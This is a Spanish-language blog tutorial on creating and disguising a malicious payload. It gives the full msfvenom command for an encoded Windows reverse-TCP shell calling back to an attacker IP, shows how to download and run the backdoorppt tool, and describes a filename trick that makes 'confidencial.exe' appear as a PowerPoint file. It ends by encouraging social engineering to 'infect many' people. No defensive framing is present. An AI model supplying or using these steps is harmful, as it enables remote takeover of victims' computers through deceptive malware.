¿Qué es un payload?.
Un payload es una carga que ejecuta una vulnerabilidad o que se aprovecha de la misma, pero el mismo tiene que ser ejecutado por el usuario para poder aprovecharse de esa vulnerabilidad.
Camuflar un payload.
Generalmente es necesario camuflarlo por que si el usuario se percata del archivo extraño no lo ejecutará, eliminará o en otros casos notificará a expertos en seguridad sobre la aparición de ese archivo o el intento por parte del alguien de enviarle un archivo extraño.
¿Qué herramienta esta disponible para ello?.
Existen infinidad de herramientas para crear y y camuflar payloads de hecho a continuación se listan 3 pero se usará para ejemplo solo una.
- msfvenom disponible en Hercules (se crea el payload).
- Metasploit framework.
- Backdoorppt (las más sencilla para usar como ejemplo de camuflado).
Comenzando a camuflar un payload con backdoorppt.
Para el presente ejemplo se usa debian GNU/Linux versión 8 y 9 ejecutar dicha herramienta.
Lo primero es descargarla ya que no se encuentra disponible por defecto en ninguna de las versiones de dicha distribución la podemos obtener con los siguientes comandos:
$ mkdir backdoorppt
$ cd backdoorppt
$ wget https://github.com/r00t-3xp10it/backdoorppt/archive/master.zip
Una vez teniendo el archivo en la pc y estando en la consola en la carpeta donde lo descargamos procedemos al siguiente paso que es descomprimirlo:
$ unzip master.zip
Luego de esto se procede a generar un payload (ojo este es un comando ejemplo para generarlo con msfvenom de Hercules) para ello se debe tener msfvenom + Hercules corriendo en el sistema operativo.
$ msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.188 LPORT=1234 -b «\x00» -e x86/shikata_ga_nai -f exe -o /tmp/documento.exe
El siguiente paso es; ejecutar backdoorppt con el siguiente comando como super usuario:
$ ./master/backdoorppt.sh
ó
$ sh master/backdoorppt.sh
Nota: si usas kde como entorno gráfico antes de ejecutar backdoorppt.sh se debe como usuario normal ejecutar el comando:
$ xhost +
El mismo se ejecutará comprobará las dependencias necesarias y como esta adaptado para sistemas tipo debian instalará las dependencias que hagan falta para su funcionamiento en caso de otras distribuciones las dependencias se deben instalar manualmente.
A continuación de mostrará una ventana para seleccionar el archivo ejecutable a camuflar lo eleccionamos pulsamos en "Aceptar" o "Abrir" luego nos mostrará otra ventana que el nombre que queremos darle a nuestro archivo payload camuflado, le damos el nombre por ejemplo: "confidencial", y pulsamos "aceptar".
Esto generará el payload camuflado, si lo vemos con el comando ls que si nombre y extensión es:
$ ls
confidencial?tpp.exe
Y en el explorador de archivos su nombre es; "confidencial.ppt", solo falta un poco de ingeniería social y aprovecharse de la curiosidad de la gente así lograrás infectar a muchos de esta manera.
Si te gusto esta entrada no dudes en realizar un donativo entrando en la sección de Ayúdame.